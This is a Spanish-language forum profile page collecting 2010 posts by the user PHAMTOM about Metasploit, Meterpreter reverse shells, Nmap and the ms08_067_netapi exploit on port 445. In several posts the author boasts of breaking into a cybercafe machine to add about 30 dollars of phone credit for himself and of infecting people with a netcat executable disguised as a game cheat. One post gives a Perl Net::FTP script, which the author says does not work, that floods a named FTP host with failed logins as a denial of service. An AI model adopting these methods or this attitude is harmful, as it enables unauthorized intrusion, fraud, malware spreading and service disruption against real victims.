Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - PHAMTOM

#41
Buenas,preguntaba si hay alguna forma de generar un exe, y pasarlo a otra pc, y cuando ese .exe se ejecute, obtenga remote shell meterpreter ?? ..

saludos,PHAMTOM.
#42
Cita de: beholdthe en 22 Marzo 2010, 03:50 AM
Cita de: PHAMTOM en 22 Marzo 2010, 02:43 AM
Cita de: beholdthe en 22 Marzo 2010, 02:22 AM
Cita de: Alex@ShellRoot en 22 Marzo 2010, 01:31 AM
Tenes algunos conceptos truncados. El payload podes usar el que se te dé la reverenda gana, (Solo soportados por el exploits, más informacion show payloads). El exploit, es él que tenes que buscar, dependiendo del reporte que te generé el Nessus!.
exacto!!  pero ese es mi problema...  :(  no se como pasar la informacion del nessus a el exploit que debo utilizar
me han dicho que me olvide del plugin id  y que me centre en el cve, pero aun asi sigo sin poder buscar  o relacionar una informacion (nessus ) con un exploit
gracias de nuevo alex

Por este foro,creo haber visto un manual por shellroot , de como pasar el resultado del nessus o nmap a metasploit , en una base de datos..
Antes de explotar una vulnerabilidad tienes que ver muchas cosas, primero , el target, que sea vulnerable, los puertos abiertos,evitar un router,windows no updatado,tienes que estar 100% seguro que el servicio que intentas atacar no esta filtrado , o bloqueado..lee sobre pasar resultados de nessus o nmap a msf , y después comenta que tal te fue.Saludos.

PD : NO ESCAPES DEL NMAP , TE DA MUCHA INFORMACIÓN,PUEDES SACAR EL SO , LOS PUERTOS, SU ESTADO ( OPEN O FILTERED ) , EL SERVICIO Y MÁS.


PHAMTOM
muchas gracias de nuevo  :D
probare todas esas cosas, pero  ufffff   tal y como me lo poneis, realmente creo q entrar en un ordenador de esta forma es algo imposible, probare a instalar mas adelante un xp nuevo, que no este parcheado  o actualizado o lo que sea.
realmente a un usuario normal que actualice de vez en cuando etc etc  SE LE PUEDE ENTRAR ASI¿?¿?¿?   porque tal y como lo poneis, lo veo muy dificil  ( hablando desde mi ignorancia claro esta )
y alguien que utilize ubuntu¿?¿   porque si en un xp  ya lo veo complicado  en ubuntu....  pero bueno igual estoy equivocado, asi q aclararme esto
muchas gracias
Aver.. aver.. aver..

Te aclaro unas dudas..

El bug , que el exploit ms08, explota, es en un servicio de windows , que usa el puerto 445 , no es en ubuntu ni linux.
El si una victima es vulnerable o no , depende de muchas cosas, tendrias que ver,no es muy dificil,solo tienes que ver y fijarte bien lo que haces, revisar paso por paso , y si no esta filtrado el puerto,que el target coincida y las direcciones de retorno tambien, tendrias que ver,para hacer las pruebas,instalate una maquina virtual , con el virtualpc , para windows , instala windows sp2 en una maquina virtual y trata de vulnerar...
Este bug del ms08_067_netapi puerto 445,es un 90% funcional en los cybers, osea que tu estas en una pc,y puedes vulnerar otra pc desde la misma red,con el msf y el exploit ms08, esto te puede dar veneficios,no hace mucho encontre un cyber,que tenia servicio de carga virtual,y me acredite el cel, disimuladamente, unos 30 $ ..

Si tienes ganas de probar los payloads , y todo el tema este, o te instalas la maquina virtual o te vas a un cyber :P , saludos.

PD : Busca en google, Manual metasploit por rcat , donde explica , nmap ,nessus,exploit(ms08_067_netapi) y meterpreter, esta muy bueno , te va a aclarar millones de dudas, ya los usuarios que leyeron el manual plantearon sus dudas y tendras todas las respuestas en ese manual , saludos y mucha suerte amigo. (ME VOY A DORMIR) ,cualquier cosa que necesites, me mandas un PM , mañana leo.-


PHAMTOM
#43
Cita de: beholdthe en 22 Marzo 2010, 02:22 AM
Cita de: Alex@ShellRoot en 22 Marzo 2010, 01:31 AM
Tenes algunos conceptos truncados. El payload podes usar el que se te dé la reverenda gana, (Solo soportados por el exploits, más informacion show payloads). El exploit, es él que tenes que buscar, dependiendo del reporte que te generé el Nessus!.
exacto!!  pero ese es mi problema...  :(  no se como pasar la informacion del nessus a el exploit que debo utilizar
me han dicho que me olvide del plugin id  y que me centre en el cve, pero aun asi sigo sin poder buscar  o relacionar una informacion (nessus ) con un exploit
gracias de nuevo alex

Por este foro,creo haber visto un manual por shellroot , de como pasar el resultado del nessus o nmap a metasploit , en una base de datos..
Antes de explotar una vulnerabilidad tienes que ver muchas cosas, primero , el target, que sea vulnerable, los puertos abiertos,evitar un router,windows no updatado,tienes que estar 100% seguro que el servicio que intentas atacar no esta filtrado , o bloqueado..lee sobre pasar resultados de nessus o nmap a msf , y después comenta que tal te fue.Saludos.

PD : NO ESCAPES DEL NMAP , TE DA MUCHA INFORMACIÓN,PUEDES SACAR EL SO , LOS PUERTOS, SU ESTADO ( OPEN O FILTERED ) , EL SERVICIO Y MÁS.


PHAMTOM
#44
Pasala un nmap , para ver el estado de los puertos que tiene el pc remoto que quieres atacar , fijate si los puertos estan FILTRADOS , quiere decir que el equipo remoto tiene firewall , y vas a tener que buscar otro lado por donde meterte, o en otro caso vulnerar el firewall....
Esta la posibilidad del router tambien.-

El payload no influye,siempre que encuentro un equipo remoto al puerto 445,puedo utilizar cualquier clase de payload,nunca me fallarón, si el equipo es 100% remoto,pude usar desde vnc,meterpreter,hasta reverseshell tcp.

Saludos.
#45
Cita de: Alex@ShellRoot en 16 Marzo 2010, 19:37 PM
1. A de ser uno muy idiota para recibir 2 archivos y más con nombre nc.exe
2. Nunca he visto algo como esto, se enviand 2 archivo. Debe ser 1 archivo por lo menos.


1)Los hay,esta llenos de idiotas.. eehh man te paso un cheat , un ok recivi y logre infectar a muchos con este archivo.
2)Que un archivo por lo menos?podes mandar un rar,  y que ejecute uno y listo.-

Cita de: Full Metal Jacket en 16 Marzo 2010, 20:01 PM
Tutorial, basico entendible  bueno para los que recien emoiezan, pero hay que poner algo claro el NC es detectado por casi todos los AVS, lo cual primero tendrias dejar 100% FUD el nc y de ahi realizar todo el procedur*

Tengo el nod 32 y no lo detectó.

El tutorial es para gente,que no tiene muchos conocimientos y recien se inician en el tema hacking,se supone que esta en hacking basico .

PHAMTOM
#46
Muchas gracias .. incognita solucionada(? xD
#47
Claro,pero si quiero comprobar 1 solo archivo de una web online??

osea si existe el archivo en el directorio web.
#48
Buenas tardes, podria pedir un ejemplo de como verificar un archivo existente en una pagina web con perl y la biblioteca LWP , ejemplo

quiero verificar que un archivo.php , exista en una pagina web o no de esta forma

miweb.com/ejemplo.php

Quiero verificar con LWP si el archivo ejemplo.php existe y si existe , imprimir con un print "OK"; y de lo contrario Print "No";

Saludos,muchas gracias de antemano.

PHAMTOM
#49
Scripting / Ftp en perl !
8 Marzo 2010, 21:38 PM
Buenas,estaba escribiendo un programa , para un ftp que es vulnerable a multriples conexiones fallidas, pero no me funciona muy bien , aca esta el codigo , aver si podeis encontrar el error


#Logo
print q(
Flood ftp
);
use Net::FTP;
#Create user and pass
my $contador=0;
my $userpass="AAAAAA";
do
{
print("Intentos : $contador");
$userpass x 1;
$contador++;
my $ftp = Net::FTP->new("ftp.jamaikamu.com") or die("No se pudo conectar al servidor: $!");
$ftp->login($userpass,$userpass);
print("Login incorrecto");
#ACCIONES QUE QUEREMOS EJECUTAR EN EL SERVIDOR
$ftp->quit or die("No se puedo desconectar del servidor: $!");
print("Intentos : $contador");
} until($contador > 600000);


Supuestamente,esto tendria que conectarse al ftp ftp.jamaikamu.com , multriples veces , con un password fallido , que va a ser el $userpass .

No me anda ni el contador, asique no sé,estare haciendo todo mal,antes de seguir mentiendo mano. :)
es algo parecido a un D.o.S
#50
Bueniisiiimoo gracias amigo : )